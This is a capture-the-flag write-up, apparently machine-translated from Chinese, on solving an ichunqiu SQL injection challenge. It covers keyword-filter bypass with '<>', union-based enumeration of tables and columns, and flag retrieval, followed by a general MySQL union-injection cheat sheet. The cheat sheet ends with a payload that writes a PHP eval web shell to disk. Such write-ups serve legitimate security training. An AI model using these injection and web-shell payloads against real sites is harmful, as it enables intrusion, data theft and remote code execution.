Visit web site title
-
Get tips:
flag{在数据库中}
, and the URL isxxx.ichunqiu.com/index.php?id=1
in line with sql injection form. -
Conventionally view source, prompt
SELECT * FROM info WHERE id=1
, a digital-type implantation
Looking for loopholes
-
?id = 1 and 1 = 1
: Tipsinj code!
, several tests and found the filterand
,or
,select
,order
, -
Gangster wp query that way around here in the middle of a sensitive word to join
<>
, then you can manually injected normal.
Gets flag
-
?id = 1 ord<> by 3
: Echo normal, indicating that the three fields inquiries -
?id = 1 union sel<>ect 1, 2, 3
: 2 echo appears, indicating that the loopholes in the second field -
Gets the database name
?id=1 union sel<>ect 1, database(), 3
: Echo database called sqli -
Gets the table name
?id=1 union sel<>ect 1, table_name, 3 from information_schema.tables where table_schema=database()
: echo table name: info, users -
Gets the field
?id=1 union sel<>ect 1, column_name, 3 from information_schema.columns where table_name='info'
: echo fields: id, title, flAg_T5ZNdrm -
Obtaining flag
?id=1 union sel<>ect 1, flAg_T5ZNdrm, 3 from info
to get flag.
mysql union select injected Review
-
union statement must ensure the same before and after the query field, it is generally the first number of fields by blasting order by. (E.g., four fields)
order by 4
-
Blasting field position, position in which to view the loopholes
union select 1,2,3,4
-
Blasting database information using the built-in functions: version () database () user () @@ global.version_compile_os
union select version(),database(),user(), @@global.version_compile_os
-
Violence Library: mysql> 5.0 has built-in library information_schema, stores all the built-in libraries and mysql table structure information.
Query existing database:
union select 1,2,3,schema_name from information_schema.schemata
-
Violence Library: Guess table
union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()
-
Violence Library: Guess field
union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name='表名'
-
Violence Library: Guess content
union select 1,2,3,字段名 from 表名 limit 0,1
-
Write directly to Ma
Condition 1: know the physical path Site
Condition 2: There is a large enough privileges
condition 3: magic_quotes_gpc () = OFF
select '<?php eval($_POST[cmd]);?>' into file 'D:\\out.php'
================================================================